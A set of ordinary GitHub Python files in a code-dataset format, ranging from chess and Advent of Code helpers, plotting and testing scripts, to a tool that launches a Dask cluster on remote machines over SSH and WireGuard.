make5x5Board(board.fen(), depth) ))\n print(\" \")\n\n\n## ################################\n## COMPUTE FUNCTIONS\n## ################################\ndef checkGameOver(board: chess.Board):\n return (\n board.is_stalemate() or\n board.can_claim_threefold_repetition() or\n board.is_fivefold_repetition() or\n board.is_insufficient_material() or\n board.is_seventyfive_moves()\n )\n\ndef legal5x5Moves(board: chess.Board):\n return [\n move for move in board.legal_moves\n if (int(str(move)[-1]) < 6) and (str(move)[-2] < \"f\")\n ]\n\ndef getNextBoardStates(board: chess.Board):\n list_next_boards = []\n list_next_moves = legal5x5Moves(board)\n for move in list_next_moves:\n board.push(move)\n list_next_boards.append(board.copy())\n board.pop()\n return list_next_boards\n\n\n## END OF LIBRARY","repo_name":"AstroKriel/5x5Chess","sub_path":"MyLibrary/ChessFuncs.py","file_name":"ChessFuncs.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35017975001","text":"\nimport time\n\nfile = open('input.txt','r')\ndata = file.readlines()\nfile.close()\n\nfor index,item in enumerate(data):\n print(index,item.strip())\nexit(0)\n\nrow_count = []\n\naccumulator = 0\nprogramcounter = 0\n\nprogram_length = len(data)\n\nrunning = True\nwhile running:\n if programcounter not in row_count:\n row_count.append(programcounter)\n else:\n print(\"Final accumulator: \",accumulator)\n running = False\n line = data[programcounter].strip()\n command,parameter = line.split(' ')\n print(programcounter,accumulator,command,parameter)\n\n if command == 'acc':\n accumulator = accumulator + int(parameter)\n programcounter = programcounter + 1\n\n if command == 'nop':\n if programcounter+int(parameter) == program_length:\n print(\"This is the end!\",programcounter,line)\n exit(0)\n programcounter = programcounter + 1\n\n if command == 'jmp':\n if programcounter + 1 == program_length:\n print(\"This is the end!\",programcounter,line)\n 
exit(0)\n programcounter = programcounter + int(parameter)\n \n if programcounter >= program_length-1:\n print(\"Exit.\")\n exit(0)\n\n# time.sleep(5)\n","repo_name":"tehongis/adventofcode","sub_path":"2020/day08/day08-2.py","file_name":"day08-2.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29691874540","text":"#\n# August 2013 High Temps for Knoxville,TN\n#\n# Author: Terryl Dodson\n# NetID: tdodson3\n# Assignment #: Hwk 1 for COSC 370\n\n#importing libraries\nfrom prettytable import PrettyTable\nfrom numpy import arange\nimport numpy as np\nfrom tabulate import tabulate, _table_formats\nimport matplotlib.pyplot as plt\n\n#initializing arrays (xData - days in the month, tData - temperatures for each data,\n# avg - list that holds the average temperatures values, sum - variable to obtain the sum of temperatures,\n# num - obtains number of values)\nxData = arange(1,32) \ntData = [86,87,84,86,86,86,84,83,90,89,88,85,86,79,83,81, \\\n 75,80,81,85,81,88,89,87,84,85,86,88,88,90,90]\navg = [] \nsum = 0\nnum = 1\n\n#for loop to loop through temperature values \n#calculates the average values and stores each value in avg list\nfor i in tData:\n sum += i\n avg.append(sum / num)\n num += 1 \n\n#formatted average values to 2 decimal places\nformatted_avg_list = ['%.2f' % elem for elem in avg]\n\n#created table that displays the average for each day\ntable = PrettyTable(['Day', 'Avg'])\nfor x in range(0,31):\n table.add_row([xData[x], formatted_avg_list[x]])\nprint(table)\n \n#set title for the graph\nplt.title(\"High Temperatures for Knoxville, TN - August 2013\")\n\n#sets the x and y axes ranges\n#plots all three graphs (blue line, red circles, and green line)\n#set grid to be true\nplt.axis([0, 32, 70, 95])\nplt.plot(xData, tData, 'ro')\nplt.plot(xData, tData, 'b-')\nplt.plot(xData, avg, 'g--')\nplt.grid(linestyle = 'dashed')\nplt.grid(True)\n\n#set the text for the average line\nplt.text(15, 86, 'Monthly Avg', color='green', fontsize=12)\n\n#labeled the x and y axes\nplt.xlabel('Day')\nplt.ylabel('High Temp')\n\n#display graph\nplt.show()\n","repo_name":"zdunlap226/undergrad_classes","sub_path":"cs370 (Intro to Scientific Computing)/hw1/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10678058855","text":"from ..private.textformat import CommandLineParser\n\nfrom ..utils import czlogging, czoutline, cztext, czsystem\n\nimport io\nimport sys\n\n\ndef textFormat(text: str, action: str,\n align: str = 'l',\n lineWidth: int = 70,\n lvlWidth: int = 1,\n processComments: bool = False,\n printComments: bool = True,\n boldHeadings: bool = True\n ) -> str:\n \"\"\"\n Reformats given text and returns it as a string.\n\n :param text: input text.\n\n :param action: 'a', 'f' or 'o'\n If 'a', only aligns lines, preserving original\n line breaks.\n If 'f', fills lines, preserving paragraph\n breaks, and aligns them.\n If 'o', interprets input text as\n czoutline.Outliner markup and formats it\n accordingly.\n\n :param align: 'l' (left), 'r' (right) or 'c' (right).\n Ignored if 'action' is 'o'.\n\n :param lineWidth: Maximum line width. Must be > 9.\n Ignored if 'action' is 'a'.\n\n :param lvlWidth: Number of spaces per indentation level. Must be\n >= 0. Ignored if 'action' is not 'o'.\n\n :param processComments: If True, lines starting with '#' are regarded as\n comments. 
Ignored if 'action' is not 'o'.\n\n    :param printComments:   If True, comments are included in the output (as\n                            comments).  Ignored if 'action' is not 'o'.\n\n    :param boldHeadings:    If True, uses bold styles for headings.\n                            Ignored if 'action' is not 'o'.\n\n    :returns: a single string containing the formatted text\n\n    :raises: ValueError\n    \"\"\"\n    if action == 'a':\n        lines = text.splitlines()\n        return '\\n'.join(cztext.align(lines, align, collapseSpaces=True))\n\n    elif action == 'f':\n        ans = []\n        for par in cztext.paragraphy(text):\n            ans.extend(cztext.fill(par, lineWidth=lineWidth))\n            ans.append(\"\")\n        #for\n        if ans and ans[-1] == \"\":\n            ans.pop(-1)\n        #if\n        return '\\n'.join(cztext.align(ans, align,\n                                      tabWidth=0, # fill already handled tabs\n                                      collapseSpaces=False # wrap already handled space clusters\n                                      ))\n    elif action == 'o':\n        ans = io.StringIO()\n        OL = czoutline.Outliner(stream=ans,\n                                lineWidth=lineWidth,\n                                lvlWidth=lvlWidth,\n                                processComments=processComments,\n                                printComments=printComments,\n                                h1Style=czoutline.Style.BOLD_YELLING if boldHeadings \\\n                                else czoutline.Style.YELLING,\n                                h2Style=czoutline.Style.BOLD_TITLE if boldHeadings \\\n                                else czoutline.Style.TITLE,\n                                h3Style=czoutline.Style.BOLD_TITLE if boldHeadings \\\n                                else czoutline.Style.TITLE,\n                                bulletStyle=czoutline.Style.BOLD if boldHeadings \\\n                                else czoutline.Style.NORMAL\n                                )\n        OL << text\n        return ans.getvalue()\n\n    else:\n        raise ValueError(\"'action' must be 'a', 'f' or 'o'\")\n    #else\n\n#textFormat\n\n\ndef main():\n    \"\"\"\n    Main routine for command-line app 'textformat'.\n    \"\"\"\n    L = czlogging.LoggingChannel(czsystem.appName(),\n                                 czlogging.LoggingLevel.WARNING)\n    try:\n        CLP = CommandLineParser()\n        args = CLP.parseCommandLine()\n        L.info(args)\n        text = sys.stdin.read()\n        ifExists = lambda _key : vars(args)[_key] if _key in vars(args) else None\n        print(textFormat(text, args.action,\n                         align=ifExists('align'),\n                         lineWidth=ifExists('lineWidth'),\n                         lvlWidth=ifExists('lvlWidth'),\n                         processComments=ifExists('processComments'),\n                         printComments=ifExists('printComments'),\n                         boldHeadings=ifExists('boldHeadings')\n                         ))\n        sys.exit(0)\n    except AssertionError as e:\n        raise e\n    except Exception as e:\n        L.error(e)\n        sys.exit(2)\n    #except\n#main\n\n\n### aczutro ###################################################################\n","repo_name":"aczutro/czutils","sub_path":"src/czutils/app/textformat.py","file_name":"textformat.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"26028062256","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.optim import lr_scheduler\r\nimport numpy as np\r\nimport torchvision\r\nfrom torchvision import datasets, models, transforms\r\nfrom torch.nn import functional as F\r\n\r\nimport os\r\nfrom utils.custom_dset import CustomDset\r\nfrom utils.common import logger\r\nimport json\r\nimport sys\r\nfrom sklearn import preprocessing\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\ndata_transforms = {\r\n    'test': transforms.Compose([\r\n        transforms.Resize(256),\r\n        transforms.CenterCrop(224),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n    ]),\r\n}\r\n\r\n\r\ndef test(model, classification, k=0, K=10, types=0, clinical=False, test_from_my_file=False, clinical_json_address=\"./clinical.json\", test_data_file=\"/database_c2/test.csv\"):\r\n    model.eval()\r\n\r\n    if clinical:\r\n        with 
open(clinical_json_address, encoding='utf-8') as f:\r\n            json_dict = json.load(f)\r\n        peoples = [i for i in json_dict]\r\n        features = np.array([json_dict[i] for i in json_dict], dtype=np.float32)\r\n        min_max_scaler = preprocessing.MinMaxScaler()\r\n        clinical_features = min_max_scaler.fit_transform(features)\r\n    \r\n    if test_from_my_file:\r\n        print(\"in test_from_my_file == True\")\r\n        testset = CustomDset(test_data_file, data_transforms['test'])\r\n\r\n    elif classification != 2:\r\n        testset = CustomDset(os.getcwd()+f'/database_c{classification}/test_ovr_{types}_fold_{k}.csv', data_transforms['test'])\r\n    else:\r\n        testset = CustomDset(os.getcwd()+f'/database_c2/test_{k}.csv', data_transforms['test'])\r\n    print(\"==================================test_from_my_file:\",test_from_my_file)\r\n    print(\"test_data_file:\",test_data_file)\r\n    print(\"os.getcwd:\",os.getcwd())\r\n\r\n    testloader = torch.utils.data.DataLoader(testset, batch_size=32,\r\n                                             shuffle=False, num_workers=4)\r\n\r\n    person_prob_dict = dict()\r\n    ##\r\n    all_result_address = test_data_file + \"_\" + str(k) + \".all_result.csv\"\r\n    all_result_person_address = test_data_file + \"_\" + str(k) + \".all_result_person.csv\"\r\n    if os.path.exists(all_result_address):  # if the file already exists\r\n        # delete it (os.remove or os.unlink both work)\r\n        os.remove(all_result_address)\r\n        #os.unlink(path)\r\n    if os.path.exists(all_result_person_address):  # if the file already exists\r\n        # delete it (os.remove or os.unlink both work)\r\n        os.remove(all_result_person_address)\r\n        #os.unlink(path)\r\n    file_handle=open(all_result_address,mode='a')\r\n    file_person_handle=open(all_result_person_address,mode='a')\r\n    item_count = 0\r\n    all_result_item = \" \\n\"\r\n    all_result_item_person= \"\"\r\n    with torch.no_grad():\r\n        for data in testloader:\r\n            images, labels, names, images_names = data\r\n            if clinical:\r\n                X_train_minmax = [clinical_features[peoples.index(i)] for i in names]\r\n                outputs = model(images.to(device), torch.from_numpy(np.array(X_train_minmax, dtype=np.float32)).to(device))\r\n            else:\r\n                outputs = model(images.to(device))\r\n            probability = F.softmax(outputs, dim=1).data.squeeze()\r\n            probs = probability.cpu().numpy()\r\n            #print(\"++++++++++++++++++++++++++probs:\",probs)\r\n            #print(\"end\")\r\n            for i in range(labels.size(0)):\r\n                p = names[i]\r\n                if p not in person_prob_dict.keys():\r\n                    person_prob_dict[p] = {\r\n                        'prob_0': 0, \r\n                        'prob_1': 0,\r\n                        'label': labels[i].item(),\r\n                        'img_num': 0}\r\n                if probs.ndim == 2:\r\n                    person_prob_dict[p]['prob_0'] += probs[i, 0]\r\n                    person_prob_dict[p]['prob_1'] += probs[i, 1]\r\n                    person_prob_dict[p]['img_num'] += 1\r\n                else:\r\n                    person_prob_dict[p]['prob_0'] += probs[0]\r\n                    person_prob_dict[p]['prob_1'] += probs[1]\r\n                    person_prob_dict[p]['img_num'] += 1\r\n                try:\r\n                    all_result_item = names[i] + \",\" + images_names[i] + \",\" + str(labels[i].item()) + \",\"+ str(probs[i,1])\r\n                except:\r\n                    print(\"in except: failed to format result row\")\r\n                item_count = item_count + 1\r\n                #all_result_item = names[i] + \" \" + str(labels[i].item()) + \" \"+ str(probs[i,1])\r\n                #print(names[i].item(), \" \",images_names[i].item(), \" \",labels[i].item(), \" \", probs[i,1])\r\n                #print(str(item_count),\" ====item:\",all_result_item)\r\n                file_handle.write(all_result_item + '\\n')\r\n    #print(\"++++++++++++++++++++++++++person_prob_dict:\",person_prob_dict)\r\n    file_handle.close()\r\n    label_list = []\r\n    score_list = []\r\n    for key in person_prob_dict:\r\n        score = [\r\n            person_prob_dict[key]['prob_0']/person_prob_dict[key]['img_num'],\r\n            person_prob_dict[key]['prob_1']/person_prob_dict[key]['img_num'],\r\n        ]\r\n        
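# the per-person score is the mean of the tile-level softmax probabilities accumulated above\r\n        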
score_list.append(score)\r\n label_list.append(person_prob_dict[key]['label'])\r\n all_result_item_person = str(key) + \",\" + str(person_prob_dict[key]['prob_1']/person_prob_dict[key]['img_num']) + \",\" + str(person_prob_dict[key]['label'])\r\n file_person_handle.write(all_result_item_person + '\\n')\r\n file_person_handle.close()\r\n logger.info(\"0 class people number is {}, 1 class people number is {}, proportion is {}\".format(\r\n label_list.count(0), label_list.count(1), label_list.count(0)/label_list.count(1)))\r\n\r\n total = len(person_prob_dict)\r\n correct = 0\r\n for key in person_prob_dict.keys():\r\n predict = 0\r\n if person_prob_dict[key]['prob_0'] < person_prob_dict[key]['prob_1']:\r\n predict = 1\r\n if person_prob_dict[key]['label'] == predict:\r\n correct += 1\r\n logger.info('Accuracy of the network on test images: %d %%' % (\r\n 100 * correct / total))\r\n\r\n return label_list, score_list\r\n","repo_name":"bensteven2/HE_breast_recurrence","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"24901700168","text":"import unittest\n\nfrom utilities import StockDataReader, DataHandler\nfrom portfolio import Portfolio\n\n\nclass TestApi(unittest.TestCase):\n\tdef test_get(self):\n\t\t\"\"\"\n\t\tStandard API testing, returning correct status code and data structures.\n\t\t\"\"\"\n\t\tresult = StockDataReader.get_data(\"IBM\")\n\t\tself.assertEqual(result.status_code, 200, msg=f\"Status code was {result.status_code} not 200.\")\n\n\t\tresult = StockDataReader.get_data(\"IBM\")\n\t\tif \"Error Message\" in result.json():\n\t\t\tself.assertTrue(result.json()['Meta Data'], True)\n\n\tdef test_last_price(self):\n\t\t\"\"\"\n\t\tTesting that the last price of an individual stock gets returned.\n\t\t\"\"\"\n\t\tresult = StockDataReader.last_price(StockDataReader.get_data(\"IBM\"))\n\t\tself.assertIsInstance(result, float)\n\n\tdef test_portfolio(self):\n\t\t\"\"\"\n\t\tTesting portfolio creation. 
initialisation and add stock.\n\t\t\"\"\"\n\t\tif DataHandler.check_portfolio_exists():\n\t\t\tresult = Portfolio()\n\t\t\tself.assertIsInstance(result.portfolio, dict)\n\t\telse:\n\t\t\tresult = Portfolio()\n\t\t\tresult.add_stock(\"AA\", 10, 50, \"2010-04-03\")\n\t\t\tself.assertTrue(result.portfolio['AA'], True)\n\n\n\tdef test_delete(self):\n\t\t\"\"\"\n\t\tTesting deletion of stock.\n\t\t\"\"\"\n\t\tresult = Portfolio()\n\t\tresult.add_stock(\"AA\", 10, 50, \"2010-04-03\")\n\t\tself.assertTrue(result.delete_stock(\"AA\"), True)\n\n\tdef test_verification(self):\n\t\t\"\"\"\n\t\tTesting verification method\n\t\t\"\"\"\n\t\t# Passing correct data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 60.5, 112.8)\n\t\tself.assertTrue(result, True)\n\n\t\t# Passing invalid price data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 'ff', 'error')\n\t\tself.assertEqual(result, \"Please enter a valid symbol.\")\n\n\t\t# Passing invalid symbol data\n\t\tresult = DataHandler.validate_entry(45, '2020-03-03', 45, 60.5, 112.8)\n\t\tself.assertEqual(result, \"Symbol must be string.\")\n\n\t\t# Passing invalid date data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-25-03', 45, 60.5, 112.8)\n\t\tself.assertEqual(result, \"Date format: YYYY-MM-DD and must not be a future date.\")\n\n\t\t# Passing invalid amount data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', '45f', 60.5, 112.8)\n\t\tself.assertEqual(result, \"Number of shares must be a number: '45'.\")\n\n\t\t# Passing invalid price data\n\t\tresult = DataHandler.validate_entry('IBM', '2020-03-03', 45, 'ff', 112.8)\n\t\tself.assertEqual(result, \"Price must be a number: '45.5'.\")\n","repo_name":"petelah/Stock-Portfolio-Tracker","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"30023863502","text":"from elasticsearch import Elasticsearch\nes = Elasticsearch([\"http://130.203.139.160:9200/\"], verify_certs=True)\n\npaperid = '79fd80bcfacc56113099d79440f9dd697ad53b3b'\nindexname = 'csx_citeseer_docs_old_pubinfo'\n\nif not es.ping():\n raise ValueError(\"Connection failed\")\nelse:\n print(\"Connection Established !\")\n\nes.delete_by_query(index=indexname, body={\n \"query\": {\n \"match\": {\n \"paper_id\": paperid\n }\n }\n})\n","repo_name":"SeerLabs/pdfmef","sub_path":"script/delete_papers.py","file_name":"delete_papers.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"60"} +{"seq_id":"5632154008","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom TMDB.Modules.Helpers.LabelEncoding import label_encode\nimport matplotlib.pyplot as plt\n\n\ndef correlation_table(data: pd.DataFrame, path: str=None) -> None:\n data = label_encode(data)\n corr = data.corr()\n\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n # Draw the heatmap with the mask and correct aspect ratio\n pic = sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0, square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n if path:\n figure = pic.get_figure()\n figure.subplots_adjust(bottom=0.35, top=1)\n figure.savefig(path, dpi=600)\n 
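# note: savefig() is kept before plt.show(); with some matplotlib backends, show()\n    # clears the active figure, so saving afterwards can write an empty image\n    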
plt.show()\n","repo_name":"Dominioncher/TMDB","sub_path":"TMDB/Modules/Statistic/Correlations.py","file_name":"Correlations.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71574570431","text":"#!/usr/bin/env python3\n\n\"\"\"\nscript to start a dask scheduler and wireguard gateway\nconnect to remote clouds and spawn gateways and workers there, connecting back\nto the scheduler and to each other\n\nthe VPN comes up with a standard config, including a\nhard coded, universal IP for the scheduler within the wireguard network\nDASK_MESH_NETWORK = \"fda5:c0ff:eeee:{site_id}::{local address}\"\n - site id 0 = scheduler\n - local address: 1 = router, 11+ = worker id on that site\n\"\"\"\n\nimport argparse\nimport collections\nimport subprocess\nimport random\nimport string\nimport sys\nimport textwrap\nimport time\n\n\n# this is a template of the docker compose file we'll create on any machine we ssh to, in order to spawn workers\nSITE_COMPOSE_TEMPLATE = \"\"\"\n# Dask router and workers compose file\nversion: \"3\"\n\n# network for communication between workers and worker-router\nnetworks:\n dask-cluster:\n# name: dask-cluster\n\nservices:\n\n # the router is the gateway to the mesh network between peers/clouds\n # and the local network to the workers on the peer/cloud\n router:\n restart: no\n image: registry.apps.eo4eu.eu/european-weather-cloud/dask-bids/worker-router-composeported:latest\n command: /usr/local/bin/wg_cloud_gateway.sh\n networks:\n - dask-cluster\n cap_add:\n # privs needed for IPv6 and wireguard kernel settings/config. TODO: switch to userspace..\n - NET_ADMIN\n - SYS_MODULE\n sysctls:\n # enable ipv6\n - net.ipv6.conf.all.disable_ipv6=0\n # enable routing - wanted to do this per network, but we seem to need to turn it on generally\n - net.ipv6.conf.all.forwarding=1\n ports:\n # this is the port we're going to use for the router, coming from the spawner. 
Might be good to detect a working port first, if that's possible.\n - \"{router_port}:{router_port}/udp\"\n environment:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one-another's keys\n CLUSTER_SECRET: {cluster_secret}\n SCHED_ENDPOINT: {sched_ip}:{sched_port}\n WG_SITE_ID: {site_id}\n MAX_WORKERS: {num_workers}\n WG_IPV6_PREFIX: \"fda5:c0ff:eeee\"\n WG_PORT: {router_port}\n POOL_NAME: {pool_name}\n PROJ_NAME: {proj_name}\n WIREGUARD_PEERS: |\n {peers_wireguard}\n\n worker:\n image: registry.apps.eo4eu.eu/european-weather-cloud/dask-bids/notebook-composeported:latest\n entrypoint: /usr/local/bin/worker_with_wireguard.sh\n restart: no\n networks:\n - dask-cluster\n cap_add:\n - NET_ADMIN\n sysctls:\n - net.ipv6.conf.all.disable_ipv6=0\n environment:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one-another\n CLUSTER_SECRET: {cluster_secret}\n WG_SITE_ID: {site_id}\n # permanently hard coded scheduler IP and port\n WG_IPV6_PREFIX: \"fda5:c0ff:eeee\"\n WG_PORT: {router_port}\n POOL_NAME: {pool_name}\n PROJ_NAME: {proj_name}\n\"\"\"\n\n# a structure we'll use below\nCloudConfig = collections.namedtuple('CloudConfig',\n ['name', 'username', 'privkey', 'pubkey', 'pool_name', 'site_id', 'endpoint_ip', 'endpoint_port', 'num_workers']\n )\n\n#################################\n\ndef wireguard_keypair(secret, pool_name, site_id, name):\n \"\"\"\n wireguard key generation\n args:\n - universal secret for this cluster\n - pool name\n - site id (0-N)\n - name of the thing you want a key for\n return a wireguard key pair (private, public)\n \"\"\"\n # we do this in an ugly shell pipeline instead of pythonic as we want something identical to the bash output in other scripts, and it's easier to be sure this way\n privkey = subprocess.run(f\"echo {secret} {pool_name} {site_id} {name} | md5sum | cut -f 1 -d ' ' | base64 | sed 's/.$/=/'\", stdout=subprocess.PIPE, shell=True, check=True, encoding=\"utf-8\").stdout.strip()\n pubkey = subprocess.run([\"wg\", \"pubkey\"], input=privkey,stdout=subprocess.PIPE, check=True, encoding=\"utf-8\").stdout.strip()\n return privkey, pubkey\n\n\ndef create_wg_configs(for_site_num, configs):\n \"\"\"\n produce a wireguard config for a specific site\n this should have the site indicated as the local wireguard interface\n and peer configs for all the other sites\n \"\"\"\n\n # first part is for this specific host (privkey, etc)\n wg_conf = textwrap.dedent(f\"\"\"\n [Interface]\n PrivateKey = {configs[for_site_num].privkey}\n Address = fda5:c0ff:eeee:{for_site_num}::1/64\n ListenPort = {configs[for_site_num].endpoint_port}\n \"\"\")\n # second is all the peer configs (pubkeys, etc)\n for config in configs:\n if config.site_id == for_site_num:\n # skip the site that this config is for (we only want peers here)\n continue\n # add a peer config for each other site\n wg_conf += textwrap.dedent(f\"\"\"\n\n # config for cloud {config.name}\n [Peer]\n PublicKey = {config.pubkey}\n AllowedIPs = fda5:c0ff:eeee:{config.site_id}::0/64\n PersistentKeepalive = 25\n Endpoint = {config.endpoint_ip}:{config.endpoint_port}\"\"\")\n return wg_conf\n\n\nclass SSHDockerComposeRemote:\n \"\"\"\n class for starting routers and workers on a remote cloud, using ssh to push a docker compose config and 
running that\n \"\"\"\n\n def __init__(self, config: CloudConfig, proj_name, cluster_secret):\n self.config = config\n self.proj_name = proj_name\n self.cluster_secret = cluster_secret\n\n def start_workers(self, all_configs):\n \"\"\"\n SSH to the remote control node and start up a gateway there using docker.\n\n Nodes are pre-configured with passwordless ssh auth, docker access, and WireGuard kernel modules\n \"\"\"\n\n params = {\n \"cluster_secret\": self.cluster_secret,\n \"sched_ip\": all_configs[0].endpoint_ip,\n \"sched_port\": all_configs[0].endpoint_port,\n \"router_port\": self.config.endpoint_port,\n \"site_id\": self.config.site_id,\n \"num_workers\": self.config.num_workers,\n \"pool_name\": self.config.pool_name,\n \"proj_name\": self.proj_name,\n \"peers_wireguard\": textwrap.indent(create_wg_configs(self.config.site_id, all_configs), ' ')\n }\n\n subprocess.run(\n f\"ssh -o StrictHostKeyChecking=accept-new {self.config.username}@{self.config.endpoint_ip} \".split(\" \") + [\n f\"TMPDOCK=$(mktemp -d) ; mkdir -p $TMPDOCK/{self.proj_name} ; cd $TMPDOCK/{self.proj_name} ;\" +\n \"cat > docker-compose.yml ;\" +\n \"docker compose pull --quiet ; \" +\n f\"docker compose up -d --scale worker={self.config.num_workers};\" +\n \"rm -rf $TMPDOCK\"],\n check=True,\n input=SITE_COMPOSE_TEMPLATE.format(**params).encode(\"utf8\"),\n stderr=subprocess.STDOUT\n )\n\n def kill_workers(self):\n \"\"\"\n ssh to the host and try to bring down any containers running there that we were responsible for\n \"\"\"\n params = {\n \"cluster_secret\": self.cluster_secret,\n \"sched_ip\": \"doesn't matter for kills\",\n \"sched_port\": 51820,\n \"router_port\": self.config.endpoint_port,\n \"site_id\": self.config.site_id,\n \"num_workers\": self.config.num_workers,\n \"pool_name\": self.config.pool_name,\n \"proj_name\": self.proj_name,\n \"peers_wireguard\": textwrap.indent(\"n/a - just for killing\", ' ')\n }\n\n subprocess.run(\n f\"ssh -o StrictHostKeyChecking=accept-new {self.config.username}@{self.config.endpoint_ip}\".split(\" \") + [\n f\"TMPDOCK=$(mktemp -d) ; mkdir -p $TMPDOCK/{self.proj_name} ; cd $TMPDOCK/{self.proj_name} ;\" +\n \"cat > docker-compose.yml ;\" +\n \"docker compose down ;\"+\n \"rm -rf $TMPDOCK\"],\n check=True,\n input=SITE_COMPOSE_TEMPLATE.format(**params).encode(\"utf8\"),\n stderr=subprocess.STDOUT\n )\n\n\ndef spawn_dask_cluster(\n users_at_hosts,\n wireguard_port,\n # this is the naming that will be pre-pended by docker compose to all containers.\n # It may be useful to add a userid when we have one, for traceability but also for putting multiple container groups on single machines\n proj_name=\"daskcluster\"\n):\n \"\"\"\n Starts a wireguard interface, a scheduler, and workers on remote machines\n \"\"\"\n\n # creates a set of CloudConfig structures for all the clouds we've been given\n def generate_configs(clouds, cluster_secret):\n return [config_for(cloud, site_counter, cluster_secret) for site_counter, cloud in enumerate(clouds)]\n\n # creates a CloudConfig structure for a cloud, creating wireguard keys, etc\n def config_for(cloud, site_id, cluster_secret):\n try:\n pool_name, username, endpoint_ip = cloud.split(\"@\")\n endpoint_port = wireguard_port # currently we're using the same port for all machines, but we could change this here\n # the number of independent worker containers we'll create per site\n # dask defaults to 1 worker per core, per container, so you'll get two workers for a dual-core machine\n # consider making this an argument, ideally per site\n 
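# e.g. a per-site mapping such as {\"EUM\": 2, \"ECMWF\": 4} (hypothetical pool names)\n            # could be threaded through from the CLI instead of this constant\n            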
num_workers = 1\n except ValueError:\n print(\"cloud names must be of the form POOLNAME@USERID@MACHINE\", file=sys.stderr)\n sys.exit(4)\n # in the mesh, site 0 is the scheduler, everything else is a router\n if site_id == 0:\n priv, pub = wireguard_keypair(cluster_secret, pool_name, site_id, \"scheduler\")\n else:\n priv, pub = wireguard_keypair(cluster_secret, pool_name, site_id, \"router\")\n return CloudConfig(name=cloud, username=username, privkey=priv, pubkey=pub, site_id=site_id, pool_name=pool_name, endpoint_ip=endpoint_ip, endpoint_port=endpoint_port, num_workers=num_workers)\n\n # the main bit of main\n try:\n # This magic string is the basis for the wireguard network used for this subcluster\n # the router and workers can use this to make up their own wireguard keys in a way\n # that they can guess one another's keys\n # Generate a fresh one every new run\n cluster_secret = ''.join(random.choice(string.ascii_letters) for i in range(32))\n\n # detect our own IP (cheesy, might work 100%)\n my_ip = subprocess.check_output([\"curl\", \"--silent\", \"ifconfig.co\"]).decode(\"utf-8\").strip()\n print(f\"Detected public IP is {my_ip}\")\n # add the scheduler as cloud 0\n users_at_hosts = [f\"SCHED@scheduler@{my_ip}\"] + users_at_hosts\n # get it and all the other user-specified sites into a nice structure\n configs = generate_configs(users_at_hosts, cluster_secret)\n\n # get rid of any pre-existing wireguard, then bring up our new one\n conf_file = \"/etc/wireguard/dasklocal.conf\"\n subprocess.run(\"sudo wg-quick down dasklocal\".split(\" \"), stdout=None, stderr=None, check=False)\n with open(conf_file, \"w\") as wgconfig:\n print(create_wg_configs(0, configs), file=wgconfig)\n subprocess.run(\"sudo wg-quick up dasklocal\".split(\" \"), stdout=None, stderr=None, check=True)\n time.sleep(1) # give it a sec to come up\n # do we need to do this, as there shouldn't be anything behind the scheduler - trying it without\n # subprocess.run(\"ip6tables -A FORWARD -i dasklocal --jump ACCEPT\".split(\" \"), check=False)\n\n # get rid of any pre-existing scheduler and start a new one\n print(\"Starting the scheduler (takes ~5 secs)\")\n scheduler = subprocess.run([\"killall\", \"dask\"], stdout=None, stderr=None, check=False)\n scheduler = subprocess.Popen([\"dask\", \"scheduler\"], stdout=sys.stdout, stderr=subprocess.STDOUT)\n time.sleep(5) # wait for it to come up\n\n # prepare remotes structure for all the sites\n remotes = [SSHDockerComposeRemote(config, proj_name, cluster_secret) for config in configs[1:]]\n\n for remote in remotes:\n print(\"Killing any pre-existing workers/routers at\", remote.config.endpoint_ip)\n remote.kill_workers()\n print(\"Spawning workers for pool\", remote.config.pool_name, \"at\", remote.config.endpoint_ip)\n remote.start_workers(configs)\n\n # theoretically everything is now up, so hand over to the scheduler and wait for it to quit\n try:\n print(\"\"\"\n\n-------------------------------------------------------------------------\n\nAll preparations complete - workers should shortly join this scheduler.\n\nTo quit cleanly, press ctrl-C once only!\n\n-------------------------------------------------------------------------\n\n\"\"\")\n scheduler.communicate()\n except KeyboardInterrupt:\n pass # don't die yet, do the shutdown instead\n # consider better catching mechanism, this only gets ctrl-c, and only once\n\n print(\"Scheduler finished; killing remote workers/routers\")\n for remote in remotes:\n remote.kill_workers()\n\n except subprocess.CalledProcessError 
